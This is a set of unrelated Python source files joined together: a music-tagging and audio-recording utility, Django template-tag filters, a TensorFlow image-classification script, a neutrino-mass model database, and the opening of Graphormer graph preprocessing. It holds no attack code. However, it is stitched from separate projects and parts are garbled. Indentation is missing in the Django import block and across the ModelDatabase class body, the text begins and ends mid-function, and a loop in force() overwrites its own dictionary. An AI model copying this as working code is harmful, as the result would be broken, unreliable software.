    n_delta_fields, n_tracks_updated = 0, 0
    for k in tagfile.tags:
        is_new = k not in tagfile.tag_copy
        is_dif = (not is_new and
                  tagfile.tags[k][0] != tagfile.tag_copy[k][0])
        if is_new or is_dif:
            n_delta_fields += 1

    # short-circuit if no changes to be made
    if n_delta_fields == 0:
        return (n_tracks_updated, n_delta_fields)

    n_tracks_updated += 1

    # prompted or automatic write
    if config["database"]["require_prompt_when_committing"]:
        printr("Proposed: ")
        # BUG FIX: sorted(dict) yields a list of keys, which has no
        # .items() and crashed pretty_dict; build a key-sorted dict.
        pretty_dict({k: tagfile.tags[k] for k in sorted(tagfile.tags)})
        if not input("Accept? [y]/n: "):
            tagfile.save()
    else:
        tagfile.save()
        printr(
            lambda: [
                sys.stdout.write(
                    colorama.Fore.RED + "." + colorama.Fore.WHITE),
                sys.stdout.flush()])
    return (n_tracks_updated, n_delta_fields)
def pretty_dict(d):
    """Print each key/value pair of *d* on its own tab-indented line."""
    for key, value in d.items():
        print("\t{}: {}".format(key, value))
def printr(func_or_msg, verbosic_precedence=3, caller=True):
    """A utility that enables callers to simplify printing behavior.

    Args:
        func_or_msg: Either a function handle to call or a message
            string to print.

    Kwargs:
        verbosic_precedence: Integer setting verbosity level.
            The message is only shown when the config value
            ``verbosity`` does not exceed this threshold; callers can
            short-circuit the config value by setting the kwarg.
        caller: Bool indicating whether or not to print the caller name.
    """
    if int(config["verbosity"]) > verbosic_precedence:
        return
    caller_name = ""
    if caller:
        # name of the calling function, one frame up the stack
        caller_name = inspect.stack()[1][3]
    # BUG FIX: `unicode` does not exist on Python 3 (this module uses
    # print()/input(), i.e. targets Python 3); `str` covers all text.
    if isinstance(func_or_msg, str):
        print("\n" +
              colorama.Fore.BLUE + caller_name +
              colorama.Fore.WHITE + ": " + func_or_msg)
    else:
        func_or_msg()
def start_shairport(filepath):
    """Kill any running shairport-sync instance and restart it, piping
    its stdout audio stream into *filepath*.
    """
    # make sure no duplicate processes are running
    subprocess.Popen(['killall', 'shairport-sync'])
    time.sleep(1)  # give the old process time to die
    with open(filepath, "w") as fptr:
        subprocess.Popen(
            ['shairport-sync', '-o=stdout'], stdout=fptr)
    printr("shairport up and running.")
def pcm2wav(pcm_name, wav_name):
    """Convert a raw PCM file (s16le, 44.1 kHz, stereo) to wav via ffmpeg."""
    subprocess.call(
        ["ffmpeg", "-hide_banner", "-y", "-f",
         "s16le", "-ar", "44.1k", "-ac", "2", "-i", pcm_name, wav_name])
def wav2flac(wav_name):
    """Utility for using ``ffmpeg`` to convert a wav file to a flac file.

    The output is written next to the input with a ``.flac`` extension.
    """
    subprocess.call(
        ["ffmpeg", "-hide_banner", "-y", "-i",
         wav_name, wav_name.replace(".wav", ".flac")])
def generate_playlist(artist, album):
    """Generate a playlist for *artist*/*album* by instantiating an
    osascript template via sed and running it.
    """
    # substitute the search term into the template; strip characters
    # that would break the sed quoting
    sed_program = 's/SEARCHTERM/"{} {}"/g'.format(
        artist, album).replace(":", "").replace("&", "")
    osa_prog = os.path.join(config["path"]["osa"], "program.js")
    osa_temp = os.path.join(config["path"]["osa"], "template.js")
    with open(osa_prog, "w") as osa:
        subprocess.Popen(['sed', sed_program, osa_temp], stdout=osa)
    subprocess.Popen(['osascript', osa_prog])
class SimpleState(object):
    """Polls a file's size to infer whether it is being written to."""

    def __init__(self, filepath):
        # approximate number of seconds spent polling so far
        self.count = 0
        self.filepath = filepath

    def get_state(self, state):
        """ return the file size, sampled with a 1 second gap to
        determine if the file is being written to.
        """
        init_size = os.path.getsize(self.filepath)
        time.sleep(1)
        last_size = os.path.getsize(self.filepath)
        self.count += 2
        if self.count % 60 == 0:
            # emit a progress dot roughly once a minute
            sys.stdout.write(".")
            sys.stdout.flush()
        # NOTE(review): the state names "finishd"/"startd" are spelled
        # exactly as callers pass them -- do not "fix" the spelling
        # without updating every call site.
        if state == "finishd":
            return last_size == init_size
        elif state == "startd":
            return last_size > init_size
def is_audio_file(name):
    """Return True when *name* has a known audio file extension, as
    defined in ``config["file"]["known_types"]``.
    """
    extension = os.path.splitext(name)[1]
    return extension in config["file"]["known_types"]
class StructuredQuery():
    """Parse a playlist query into tag keys, relations, operators and
    tag values, producing a list of filter dicts.
    """

    def __init__(self, querystr):
        self.query = querystr
        # NOTE(review): if `querystr` is a plain string, these
        # comprehensions iterate its *characters*, not tokens --
        # presumably callers pass a pre-tokenised sequence; confirm.
        self.keys = [key for key in self.query
                     if key in config["playlist"]["tag_keys"]]
        relations = [key for key in self.query
                     if key in config["playlist"]["relations"]]
        self.operators = [key for key in self.query
                          if key in config["playlist"]["operators"]]
        # anything that is neither a key, relation nor operator is a value
        self.tag_vals = [key for key in self.query if
                         key not in self.keys and
                         key not in relations and
                         key not in self.operators]
        # NOTE(review): assumes len(keys) == len(tag_vals) ==
        # len(relations) == len(operators) + 1; malformed queries raise
        # IndexError here -- confirm against callers.
        self.filters = [{self.keys[i]: self.tag_vals[i], "rel": relations[i]}
                        for i in range(len(self.operators) + 1)]
        if not self.operators:
            self.operators.append("AND")

    def __repr__(self):
        return str(["{}".format(filt) for filt in self.filters])
|
<filename>boilerplate/templatetags/boilerplate.py
# -*- coding: utf-8 -*-
from django import template
from django.contrib.admin.utils import NestedObjects
try:
from django.urls import reverse
except ImportError:
from django.core.urlresolvers import reverse
from django.db import DEFAULT_DB_ALIAS
from django.utils.text import slugify
from ..boilerplate import get_boilerplate_setting
# Template tag registry for this module.
register = template.Library()

# URL naming conventions, overridable through boilerplate settings.
URL_LIST_SUFFIX = get_boilerplate_setting('model_url_list_suffix', '_list')
APP_URL_INDEX = get_boilerplate_setting('app_url_index', 'home')
@register.simple_tag
def url_replace(request, field, value):
    """Return the current query string with *field* replaced by *value*."""
    params = request.GET.copy()
    params[field] = str(value)
    return params.urlencode()
@register.filter
def get_deleted_objects(object):
    """
    List the related objects that would be cascade-deleted together
    with *object* (nested, as the admin delete-confirmation page does).
    """
    # NOTE: the parameter shadows the `object` builtin; kept for
    # template-filter signature compatibility.
    collector = NestedObjects(using=DEFAULT_DB_ALIAS)
    collector.collect([object])
    return collector.nested()
"""
Form filters
"""
@register.filter
def form_model_name(value):
    """Return the verbose name of the model behind a form.

    Falls back to the form's class name when no model is attached.
    """
    try:
        meta = value._meta.model._meta
        return meta.verbose_name
    except Exception:
        return value.__class__.__name__
@register.filter
def form_model_name_plural(value):
    """Return the plural verbose name of the model behind a form."""
    meta = value._meta.model._meta
    return meta.verbose_name_plural
@register.filter
def form_model_url(value):
    """Return the list-view url name of a form's model."""
    app_label = value._meta.model._meta.app_label
    model_name = value._meta.model.__name__.lower()
    return '{}:{}{}'.format(app_label, model_name, URL_LIST_SUFFIX)
@register.filter
def form_app_name(value):
    """Return the verbose name of the app owning a form's model."""
    meta = value._meta.model._meta
    return meta.app_config.verbose_name
@register.filter
def form_app_url(value):
    """Return the app home url name of a form's model."""
    app_label = value._meta.model._meta.app_label.lower()
    return '{}:{}'.format(app_label, APP_URL_INDEX)
@register.filter
def form_prefix(value):
    """Return the form's class name slugified, for use as a prefix."""
    class_name = value.__class__.__name__
    return slugify(class_name.lower())
@register.filter
def formset_model_name(value):
    """Return the verbose name of a formset's model, or the formset's
    class name when it has no model."""
    try:
        meta = value.model._meta
        return meta.verbose_name
    except AttributeError:
        return str(value.__class__.__name__)
@register.filter
def formset_model_name_plural(value):
    """Return the plural verbose name of a formset's model, or the
    formset's class name when it has no model."""
    try:
        meta = value.model._meta
        return meta.verbose_name_plural
    except AttributeError:
        return str(value.__class__.__name__)
"""
Model filters
"""
@register.simple_tag
def model_action(value, action):
    """Resolve the url of *action* for the object *value*.

    **Usage**
    ::

        {% model_action object 'update' %}
    """
    url_name = '{}:{}_{}'.format(
        value._meta.model._meta.app_label,
        value._meta.model.__name__.lower(),
        action,
    )
    return reverse(url_name, args=(value.pk,))
@register.simple_tag
def model_child_action(value, parent, action):
    """Resolve the url of *action* for *value* nested under *parent*.

    **Usage**
    ::

        {% model_child_action object parent 'update' %}
    """
    url_name = '{}:{}_{}_{}'.format(
        parent._meta.model._meta.app_label,
        parent._meta.model.__name__.lower(),
        value._meta.model.__name__.lower(),
        action,
    )
    return reverse(url_name, args=(parent.pk, value.pk,))
@register.filter
def model_name(value):
    """Return the verbose name of an object's model."""
    meta = value._meta
    return meta.verbose_name
@register.filter
def model_name_plural(value):
    """Return the plural verbose name of an object's model."""
    meta = value._meta
    return meta.verbose_name_plural
@register.filter
def model_app_name(value):
    """Return the verbose name of the app owning an object's model."""
    meta = value._meta
    return meta.app_config.verbose_name
@register.filter
def model_app_url(value):
    """Return the app home url name of an object's model."""
    app_label = value._meta.app_label.lower().replace(" ", "_")
    return '{}:{}'.format(app_label, APP_URL_INDEX)
@register.filter
def model_url(value):
    """Return the list-view url name of an object's model."""
    app_label = value._meta.model._meta.app_label
    model_name = value._meta.model.__name__.lower()
    return '{}:{}{}'.format(app_label, model_name, URL_LIST_SUFFIX)
"""
Queryset filters
"""
@register.filter
def queryset_app_name(value):
    """Return the verbose name of the app owning a queryset's model."""
    meta = value.model._meta
    return meta.app_config.verbose_name
@register.filter
def queryset_app_url(value):
    """Return the app home url name of a queryset's model."""
    app_label = value.model._meta.app_label.lower()
    return '{}:{}'.format(app_label, APP_URL_INDEX)
@register.filter
def queryset_model_name_plural(value):
    """Return the plural verbose name of a queryset's model."""
    meta = value.model._meta
    return meta.verbose_name_plural
@register.filter
def queryset_model_url(value):
    """Return the list-view url name of a queryset's model."""
    app_label = value.model._meta.app_label.lower()
    model_name = value.model.__name__.lower()
    return '{}:{}{}'.format(app_label, model_name, URL_LIST_SUFFIX)
@register.simple_tag
def queryset_action(value, action):
    """Resolve the url of *action* for a queryset's model.

    **Parameters**:

        :value: A valid queryset of objects
        :action: A valid action name, e.g. ``'add'``

    **Usage**
    ::

        {% queryset_action queryset 'add' %}
    """
    url_name = '{}:{}_{}'.format(
        value.model._meta.app_label,
        value.model.__name__.lower(),
        action,
    )
    return reverse(url_name)
|
<gh_stars>1-10
# Copyright 2019 ChangyuLiu Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from models import *
from dataset import get_label_name
import tensorflow as tf
import matplotlib.pyplot as plt
from PIL import Image
import argparse
# ---- command-line interface -------------------------------------------
parser = argparse.ArgumentParser('Prediction mnist label')
parser.add_argument('--path', type=str,
                    help='Image path, best input abs path. `./datasets/cat.png`')
parser.add_argument('--height', type=int, default=224,
                    help='Image height. default: 224')
parser.add_argument('--width', type=int, default=224,
                    help='Image width. default: 224')
parser.add_argument('--channels', type=int, default=3,
                    help='Image color RBG. default: 3')
parser.add_argument('--classes', type=int, default=2,
                    help="Classification picture type. default: 2")
parser.add_argument('--checkpoint_dir', '--dir', type=str, default='training_checkpoint',
                    help="Model save path.")
parser.add_argument('--dis', type=bool, default=False,
                    help='display matplotlib? default: False.')
args = parser.parse_args()

# int -> human-readable label name mapping from the dataset metadata
label_names = get_label_name()
label_names = label_names.features['label'].int2str

# MobileNetV2 backbone (imagenet weights) + global pooling + softmax head
base_model = MobileNetV2(include_top=False,
                         input_shape=(args.height, args.width, args.channels),
                         weights='imagenet',
                         classes=args.classes)
avg_pool = tf.keras.layers.GlobalAveragePooling2D()
fc = tf.keras.layers.Dense(args.classes,
                           activation=tf.nn.softmax,
                           name='Logits')
model = tf.keras.Sequential([
    base_model,
    avg_pool,
    fc
])
def process_image(image, height=args.height, width=args.width,
                  channels=3):
    """Load an image file and prepare it as a model input tensor.

    Args:
        image: str, path of the image file to read.
        height: int, target height after resize.
        width: int, target width after resize.
        channels: int, number of color channels to decode to.
            Previously hard-coded to 3; exposed so callers can honor
            ``--channels`` (the default keeps the old behavior).

    Returns:
        float32 tensor of shape (height, width, channels) with values
        normalized to [0, 1].
    """
    # read img to string.
    image = tf.io.read_file(image)
    # decode to a tensor with the requested channel count
    image = tf.image.decode_image(image, channels=channels)
    # convert image to float32
    image = tf.cast(image, tf.float32)
    # image norm.
    image = image / 255.
    # resize to the model's input size
    image = tf.image.resize(image, (height, width))
    return image
def prediction(image):
    """Predict and print the label of an image.

    Restores the latest checkpoint, runs the model on *image*, prints
    the predicted label and optionally displays the picture.

    Args:
        image: str, path of the image file to classify.

    Returns:
        None; the result is printed (and plotted when --dis is set).
    """
    image = process_image(image)
    # Add the image to a batch where it's the only member.
    image = (tf.expand_dims(image, 0))
    print(f"==========================================")
    print(f"Loading model.............................")
    checkpoint = tf.train.Checkpoint(model=model)
    checkpoint.restore(tf.train.latest_checkpoint(checkpoint_dir=args.checkpoint_dir))
    print(f"Load model successful!")
    print(f"==========================================")
    print(f"Start making predictions about the picture.")
    print(f"==========================================")
    predictions = model(image)
    # index of the highest-probability class
    classes = int(tf.argmax(predictions[0]))
    print(f"Label is : {label_names(classes)}")
    if args.dis:
        # show the original image with the predicted label as x-axis text
        image = Image.open(args.path)
        plt.figure(figsize=(4, 4))
        plt.xticks([])
        plt.yticks([])
        plt.grid(False)
        plt.imshow(image, cmap='gray')
        plt.xlabel(label_names(classes))
        plt.show()
# Script entry point: classify the image given on the command line.
if __name__ == '__main__':
    prediction(args.path)
|
#!/usr/bin/env python3
from neutrinomass.tensormethod import D, L, Q, H, eb, ub, db, eps, delta
from neutrinomass.tensormethod.core import IndexedField, Field
from neutrinomass.completions.topologies import Leaf
from neutrinomass.completions.core import (
EffectiveOperator,
Completion,
cons_completion_field,
)
from neutrinomass.utils.functions import conjugate_field, conjugate_term
from neutrinomass.database.utils import subsets
from functools import reduce
import operator
from networkx import Graph
from collections import defaultdict
import time
from typing import Dict, List
import re
import math
import numpy as np
from sympy import prime
from sympy.ntheory import factorint
from itertools import groupby
import os
from glob import glob
import pandas as pd
import pickle
# Short alias: exotic fields are built through `cons_completion_field`.
ExoticField = cons_completion_field
def match(pattern: str, data: str):
    """Anchored regex match of *pattern* at the start of *data*.

    Thin wrapper around ``re.match``; returns a Match object or None.
    """
    return re.match(pattern, data)
def matches_in(pattern, coll):
    """Return True when *pattern* matches at least one element of *coll*."""
    for item in coll:
        if match(pattern, item):
            return True
    return False
def Partition(*args):
    """Represent a partition simply as a tuple of its arguments."""
    return tuple(args)
class LazyCompletion:
    """A completion whose full object is stored as unevaluated source.

    ``head`` is a dict holding the cheap, always-available summary data
    (quantum numbers, operator name, terms); ``tail`` is a string of
    Python source that ``force`` evaluates to build the complete
    Completion object on demand.
    """

    def __init__(self, head: dict, tail: str):
        self.head = head
        self.tail = tail
        assert "quantum_numbers" in self.head
        assert "operator_name" in self.head

    def force(self):
        # NOTE: eval of stored source -- only safe on trusted databases.
        return eval(self.tail)

    @property
    def quantum_numbers(self):
        return set(self.head["quantum_numbers"])

    @property
    def operator_name(self):
        return self.head["operator_name"]

    def contains_field(self, pattern):
        """True when some exotic field matches the regex *pattern*."""
        return matches_in(pattern, self.quantum_numbers)

    def contains_interaction(self, patterns):
        """True when some interaction term matches every regex in *patterns*."""
        for interaction in self.head["terms"]:
            if all(bool(matches_in(p, interaction)) for p in patterns):
                return True
        return False
def read_completions(filename: str):
    """Read a completions database file into a dict keyed by operator name.

    Each line of the file is Python source evaluating to a
    (Lazy)Completion object.
    """
    completions = defaultdict(list)
    with open(filename, "r") as stream:
        for line in stream:
            comp = eval(line)  # trusted database files only
            completions[comp.operator_name].append(comp)
    return completions
class ModelDataFrame(pd.DataFrame):
    """DataFrame of models carrying bidirectional exotic/term <-> prime
    lookup tables as metadata."""

    # pandas propagates these attributes through DataFrame operations
    _metadata = [
        "exotics",
        "terms",
        "exotic2int",
        "int2exotic",
        "term2int",
        "int2term",
    ]

    @property
    def _constructor(self):
        # keep the subclass type through pandas operations
        return ModelDataFrame

    @classmethod
    def new(cls, data, exotics, terms):
        """Build a ModelDataFrame and attach both forward and inverse
        prime lookup tables for exotic fields and Lagrangian terms."""
        df = cls(data)
        df.exotic2int = {k: v for k, v in exotics.items()}
        df.int2exotic = {v: k for k, v in exotics.items()}
        df.exotics = {**df.exotic2int, **df.int2exotic}
        df.term2int = {k: v for k, v in terms.items()}
        df.int2term = {v: k for k, v in terms.items()}
        df.terms = {**df.term2int, **df.int2term}
        return df

    def completion(self, index: int) -> Completion:
        """Materialise the Completion stored as source at *index*."""
        # NOTE(review): eval of stored source -- trusted data only.
        return eval(self["completion"][index])

    def related_models(self, index: int) -> "ModelDataFrame":
        """Rows whose democratic number is the product of a proper
        subset (of size > 1) of this row's prime factors."""
        demo_num = self["democratic_num"][index]
        factor_groups = [l for l in subsets(factorint(demo_num)) if len(l) > 1]
        indices = []
        for group in factor_groups:
            prod = reduce(operator.mul, group)
            indices += list(self[self["democratic_num"] == prod].index)
        # the row itself always appears; drop it from the result
        indices.remove(index)
        return self.loc[indices]
class ModelDatabase:
def __init__(
    self,
    path: str,
    philosophy: str = "democratic",
    criterion: str = "mass",
    data=None,
):
    """Build a model database.

    Args:
        path: directory containing ``*.dat`` completion files (ignored
            when *data* is given).
        philosophy: "democratic" (compare models by field content) or
            "stringent" (compare by Lagrangian terms).
        criterion: "mass" or "dimension" filtering criterion.
        data: optional pre-built {operator_name: [completions]} dict.
    """
    self.philosophy = philosophy
    self.criterion = criterion
    self.is_forced = False
    assert self.philosophy in {"democratic", "stringent"}
    assert self.criterion in {"mass", "dimension"}
    if data is None:
        self.path = path
        # print("Initialising database...")
        filenames = glob(os.path.join(self.path, "*.dat"))
        mvdb_data = [dict(read_completions(f)) for f in filenames]
        mv_dict = {k: v for d in mvdb_data for k, v in d.items()}
        self.data = mv_dict
    else:
        self.path = None
        # NOTE(review): is_ordered is only set on this branch -- other
        # code paths may hit AttributeError; confirm intended.
        self.is_ordered = True
        self.data = data

    # initialise prime dictionary: map every exotic field (and its
    # conjugate) to the same unique prime number
    exotics = {}
    counter = 1
    for k, v in self.data.items():
        for model in v:
            for exotic in model.quantum_numbers:
                if exotic not in exotics:
                    exotics[conjugate_field(exotic)] = prime(counter)
                    exotics[exotic] = prime(counter)
                    counter += 1
    # dict mapping exotic field (str representation) to unique prime number
    self.exotic_prime_dict = exotics
    self.inv_exotic_prime_dict = {v: k for k, v in self.exotic_prime_dict.items()}

    # same scheme for interaction terms (term and conjugate share a prime)
    term_dict = {}
    counter = 1
    for k, v in self.data.items():
        for model in v:
            n_terms = len(model.head["terms"])
            for i in range(n_terms):
                # sort all of the terms by side effect
                term = tuple(sorted(model.head["terms"][i]))
                model.head["terms"][i] = term
                if term not in term_dict:
                    # add conj term first so that when filtering you keep
                    # the unconjugated term
                    term_dict[conjugate_term(term)] = prime(counter)
                    term_dict[term] = prime(counter)
                    counter += 1
    # dict mapping sorted tuple of strings representing interaction (and
    # conjugate) to unique prime number
    self.term_prime_dict = term_dict
    self.inv_term_prime_dict = {v: k for k, v in self.term_prime_dict.items()}

    # dict mapping operator label to neutrino-mass scale estimate;
    # populated elsewhere before the mass filters run
    self.scale_dict = None
    self.symbolic_scale_dict = None

    # 2D array with number of models rejected from completions of jth
    # ordered operator because a subset features in completions of ith
    # ordered operator
    self.filter_data = np.zeros([len(self.data), len(self.data)])
@property
def is_democratic(self):
    # models are identified by field content alone
    return self.philosophy == "democratic"
@property
def is_stringent(self):
    # models are identified by their Lagrangian terms
    return self.philosophy == "stringent"
@property
def is_mass(self):
    # filtering uses the neutrino-mass-scale criterion
    return self.criterion == "mass"
@property
def is_dimension(self):
    # filtering uses the operator-dimension criterion
    return self.criterion == "dimension"
def query(self, func):
"""Function that acts on each model"""
return {k: [m for m in v if func(m)] for k, v in self.data.items()}
def filter_by_query(self, func):
"""Alter internal data from results of query by side effect"""
self.data = self.query(func)
@classmethod
def no_seesaws(cls, model):
"""Aux. query to remove seesaw fields"""
no_seesaws = (
lambda m: not m.contains_field("F,00,2,0,0")
and not m.contains_field("F,00,0,0,0")
and not m.contains_field("S,00,2,1,0")
)
return no_seesaws(model)
# model number is the product of primes representing the model
def democratic_model_number(self, model):
"""Product of primes representing the fields in the model"""
prod = 1
for qn in model.quantum_numbers:
prod *= self.exotic_prime_dict[qn]
return prod
def stringent_model_number(self, model):
"""Product of primes representing the terms in the Lagrangian of the model"""
prod = 1
for term in model.head["terms"]:
prod *= self.term_prime_dict[term]
return prod
def model_number(self, model):
"""General dispatch for model number"""
if self.is_democratic:
return self.democratic_model_number(model)
return self.stringent_model_number(model)
def force(self):
"""Upgrade internal data from LazyCompletion objects to Completion objects. May
take a while to run, probably filter the database down a little before
running this.
"""
if self.is_forced:
return
self.is_forced = True
for k, v in self.data.items():
self.data = {k: [m.force() for m in v]}
def democratic_remove_equivalent_models(self):
    """Removes duplicate models, comparing by field content only."""
    from neutrinomass.utils.functions import remove_equivalent_nopop

    def eq(x, y):
        # equal prime products <=> identical field content
        return self.democratic_model_number(x) == self.democratic_model_number(y)

    for k, v in self.data.items():
        self.data[k] = remove_equivalent_nopop(v, eq_func=eq)
def stringent_remove_equivalent_models(self):
    """Removes duplicate models, comparing by Lagrangian terms."""
    from neutrinomass.utils.functions import remove_equivalent_nopop

    def eq(x, y):
        # equal prime products <=> identical interaction terms
        return self.stringent_model_number(x) == self.stringent_model_number(y)

    for k, v in self.data.items():
        self.data[k] = remove_equivalent_nopop(v, eq_func=eq)
def remove_equivalent_models(self):
"""General dispatch function for removing equivalent models"""
if self.is_democratic:
return self.democratic_remove_equivalent_models()
return self.stringent_remove_equivalent_models()
def filter_model_by_mass(self, op: str, model, keep_filter_data=False):
    """Remove all completions with the same or a subset of the particle content of
    an upstream model by the neutrino-mass criterion, i.e. only keep
    leading-order contributions to the neutrino mass.

    Dispatch on filtering philosophy handled by call to `model_number`.
    When ``keep_filter_data`` is set, record in ``self.filter_data`` what
    fraction of each downstream operator's completions this sieve removed.
    """
    op_scale = self.scale_dict[op]
    sieve = self.model_number(model)
    if keep_filter_data:
        # Hoisted out of the loops: the label order and the sieve position
        # are invariant while only dict *values* are reassigned below.
        ordered_op_label_list = list(self.data)
        sieve_op_pos = ordered_op_label_list.index(op)
    for k, v in self.data.items():
        # Only operators implying a *lower* scale can be filtered by `op`.
        if self.scale_dict[k] >= op_scale:
            continue
        if keep_filter_data:
            other_op_pos = ordered_op_label_list.index(k)
        new_v = []
        for test_model in v:
            # Divisibility of the prime product means `test_model` contains
            # the sieve model's content (or a superset of it).
            if self.model_number(test_model) % sieve != 0:
                new_v.append(test_model)
                continue
            if keep_filter_data:
                self.filter_data[sieve_op_pos][other_op_pos] += 1 / len(v)
        self.data[k] = new_v
def filter_one_loop_weinberg(self, democratic_nums):
    """Drop completions divisible by any sieve in ``democratic_nums`` from
    every operator whose scale lies below the one-loop Weinberg scale."""
    one_loop_scale = 605520000000.0 / (16 * math.pi ** 2)
    for label, models in self.data.items():
        if self.scale_dict[label] >= one_loop_scale:
            continue
        survivors = []
        for candidate in models:
            number = self.democratic_model_number(candidate)
            if not any(number % sieve == 0 for sieve in democratic_nums):
                survivors.append(candidate)
        self.data[label] = survivors
def filter_models_by_mass(self, op: str):
    """Use every completion of ``op`` as a mass sieve on downstream operators."""
    for sieve_model in self.data[op]:
        self.filter_model_by_mass(op, sieve_model)
def filter_by_mass(self):
    """Apply the mass filter with every operator acting as a sieve in turn."""
    for label in self.data:
        self.filter_models_by_mass(label)
def filter_model_by_dimension(self, op: str, model):
    """Remove all completions with the same or a subset of the particle content of
    an upstream model by the dimension criterion, i.e. only keep models that
    would imply lower dimensional operators.

    Dispatch on filtering philosophy handled by call to `model_number`.
    Always records the removed fraction in ``self.filter_data``.
    """
    from neutrinomass.completions import EFF_OPERATORS
    from neutrinomass.completions import DERIV_EFF_OPERATORS

    ops = {**EFF_OPERATORS, **DERIV_EFF_OPERATORS}
    op_dim = ops[op].mass_dimension
    sieve = self.model_number(model)
    # Hoisted out of the loops (consistent with `filter_model_by_mass`):
    # label order and sieve position are invariant while filtering.
    ordered_op_label_list = list(self.data)
    sieve_op_pos = ordered_op_label_list.index(op)
    for k, v in self.data.items():
        # Only strictly higher-dimensional operators can be filtered by `op`.
        if ops[k].mass_dimension <= op_dim:
            continue
        other_op_pos = ordered_op_label_list.index(k)
        new_v = []
        for test_model in v:
            if self.model_number(test_model) % sieve != 0:
                new_v.append(test_model)
                continue
            self.filter_data[sieve_op_pos][other_op_pos] += 1 / len(v)
        self.data[k] = new_v
def filter_models_by_dimension(self, op: str):
    """Use every completion of ``op`` as a dimension sieve."""
    for sieve_model in self.data[op]:
        self.filter_model_by_dimension(op, sieve_model)
def filter_by_dimension(self):
    """Apply the dimension filter with every operator acting as a sieve."""
    for label in self.data:
        self.filter_models_by_dimension(label)
def filter(self):
    """Ensure the data is ordered, then apply the configured filter."""
    if not self.is_ordered:
        self.order()
    chosen = self.filter_by_mass if self.is_mass else self.filter_by_dimension
    chosen()
def fill_scale_dict(self):
    """Populate ``scale_dict`` and ``symbolic_scale_dict`` with, for each
    operator, the largest numerical new-physics scale estimate and the
    symbolic expression that produced it."""
    from neutrinomass.database import neutrino_mass_estimate
    from neutrinomass.database import numerical_np_scale_estimate
    from neutrinomass.completions import EFF_OPERATORS
    from neutrinomass.completions import DERIV_EFF_OPERATORS

    numeric, symbolic = {}, {}
    ops = {**EFF_OPERATORS, **DERIV_EFF_OPERATORS}
    for label, operator in ops.items():
        best_scale, best_expr = 0, None
        for expr in neutrino_mass_estimate(operator):
            candidate = numerical_np_scale_estimate(expr)
            if candidate > best_scale:
                best_scale, best_expr = candidate, expr
        # Every operator must yield at least one positive estimate.
        assert best_scale > 0
        assert best_expr is not None
        numeric[label] = best_scale
        symbolic[label] = best_expr
    self.scale_dict = numeric
    self.symbolic_scale_dict = symbolic
def order_by_mass(self):
    """Provides `scale_dict` and orders the data dictionary by neutrino mass
    scale prediction (largest implied scale first).

    Currently does the same as `fill_scale_dict` but also orders `data`.
    """
    from neutrinomass.database import neutrino_mass_estimate
    from neutrinomass.database import numerical_np_scale_estimate
    from neutrinomass.completions import EFF_OPERATORS
    from neutrinomass.completions import DERIV_EFF_OPERATORS

    def scale_pred(op):
        # Largest numerical scale over all mass estimates of the operator.
        return max(
            numerical_np_scale_estimate(i) for i in neutrino_mass_estimate(op)
        )

    ops = {**EFF_OPERATORS, **DERIV_EFF_OPERATORS}
    scales = {k: scale_pred(v) for k, v in ops.items() if k in self.data}
    # `reversed(sorted(...))` is kept (rather than `sorted(..., reverse=True)`)
    # so that ties are ordered exactly as before.
    mv_ordered = dict(reversed(sorted(scales.items(), key=lambda x: x[1])))
    # Fixed: previously an identity dict-comprehension copy and an `.items()`
    # iteration whose values were ignored.
    self.scale_dict = dict(mv_ordered)
    self.data = {k: self.data[k] for k in mv_ordered}
    self.is_ordered = True
def order_by_dimension(self):
    """Reorder ``data`` so operator labels ascend in mass dimension."""
    from neutrinomass.completions import EFF_OPERATORS
    from neutrinomass.completions import DERIV_EFF_OPERATORS

    ops = {**EFF_OPERATORS, **DERIV_EFF_OPERATORS}
    self.data = dict(
        sorted(self.data.items(), key=lambda kv: ops[kv[0]].mass_dimension)
    )
    self.is_ordered = True
def order(self):
    """General dispatch on order by filtering criterion."""
    chosen = self.order_by_mass if self.is_mass else self.order_by_dimension
    chosen()
def process(self, filter_seesaws=False):
    """Run the common preprocessing pipeline: optional seesaw-field removal,
    deduplication, ordering, then filtering."""
    if filter_seesaws:
        self.filter_by_query(ModelDatabase.no_seesaws)
    self.remove_equivalent_models()
    self.order()
    self.filter()
def _load_pickled(filename):
    """Unpickle a data file shipped alongside this module.

    Fixes a resource leak: the previous ``pickle.load(open(...))`` calls
    never closed their file handles; a context manager guarantees closure.
    """
    path = os.path.join(os.path.dirname(__file__), filename)
    with open(path, "rb") as fileobj:
        return pickle.load(fileobj)


# Pre-built databases distributed with the package.
DATA = _load_pickled("democratic.p")
EXOTICS = _load_pickled("exotics.p")
TERMS = _load_pickled("terms.p")

MVDF = ModelDataFrame.new(data=DATA, exotics=EXOTICS, terms=TERMS)
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import random
import torch
import numpy as np
import torch_geometric.datasets
from ogb.graphproppred import PygGraphPropPredDataset
from ogb.lsc.pcqm4m_pyg import PygPCQM4MDataset
import pyximport
pyximport.install(setup_args={"include_dirs": np.get_include()})
import algos
def convert_to_single_emb(x, offset=512):
    """Shift each feature column into its own disjoint id range.

    Column ``j`` is offset by ``1 + j * offset`` so that different feature
    columns never share embedding indices.
    """
    num_features = x.size(1) if x.dim() > 1 else 1
    shifts = 1 + torch.arange(0, num_features * offset, offset, dtype=torch.long)
    return x + shifts
def preprocess_item(item):
    """Attach Graphormer-style structural features to a PyG data object.

    Adds: offset node features, a dense boolean adjacency padded with virtual
    tokens, a dense edge-type tensor, shortest-path distances (``rel_pos``),
    per-path edge features (``edge_input``), in/out degrees and an all-zero
    attention bias of size ``(N + num_virtual_tokens)**2``.
    """
    num_virtual_tokens = 1
    edge_attr, edge_index, x = item.edge_attr, item.edge_index, item.x
    if edge_attr is None:
        # Graphs without edge features get a zero feature per edge.
        edge_attr = torch.zeros((edge_index.shape[1]), dtype=torch.long)
    N = x.size(0)
    x = convert_to_single_emb(x)  # For ZINC: [n_nodes, 1]

    # Dense boolean adjacency over the real nodes only.
    adj_orig = torch.zeros([N, N], dtype=torch.bool)
    adj_orig[edge_index[0, :], edge_index[1, :]] = True

    # Dense per-pair edge features; the +1 keeps 0 as the "no edge" id.
    if len(edge_attr.size()) == 1:
        edge_attr = edge_attr[:, None]
